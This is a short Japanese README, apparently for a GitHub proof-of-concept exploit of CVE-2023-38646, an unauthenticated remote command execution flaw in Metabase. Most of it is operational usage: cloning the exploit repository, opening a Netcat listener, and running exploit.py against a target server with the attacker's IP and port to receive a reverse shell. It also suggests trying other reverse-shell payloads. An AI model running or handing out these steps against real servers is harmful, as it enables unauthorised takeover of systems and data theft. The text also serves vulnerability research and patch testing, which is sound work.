
これは、オープンソースのビジネスインテリジェンスおよびデータ分析ツールであるMetabaseを悪用するための概念実証(PoC)スクリプトです。
これは、オープンソースのビジネスインテリジェンスおよびデータ分析ツールであるMetabaseを悪用するための概念実証(PoC)スクリプトです。Metabaseを使用すると、ユーザーはデータを可視化して操作できるため、データ分析のための強力なプラットフォームとなります。
CVE-2023-38646として指定されたこの脆弱性により、攻撃者は認証を必要とせずにサーバー上で任意のコマンドを実行できました。この欠陥の影響は深刻で、サーバーの権限レベルでサーバーへの不正アクセスが可能になりました。
リポジトリをクローンする
git clone https://github.com/threatHNTR/CVE-2023-38646.git
リポジトリに移動する
cd CVE-2023-38646
スクリプトを実行する前に、Netcatリスナーを設定する
nc -nlvp chosen-port
スクリプトを実行する
python3 exploit.py -u http://target-metabase-server -i your-ip-address -p chosen-port
悪用: スクリプトはターゲットのMetabaseサーバーにリバースシェルを送信しようとします。成功すると、マシン上でシェルを受け取ります。ペイロードを変更して、さまざまなリバースシェルを試すことができます。
GitHubアドバイザリ: https://github.com/advisories/GHSA-jg32-8h6w-x7vg
Metabaseアドバイザリ: https://www.metabase.com/blog/security-advisory
Metabase GitHub: https://github.com/metabase/metabase
Assetnoteブログ - MetabaseにおけるPre-Auth RCEへの連鎖: https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/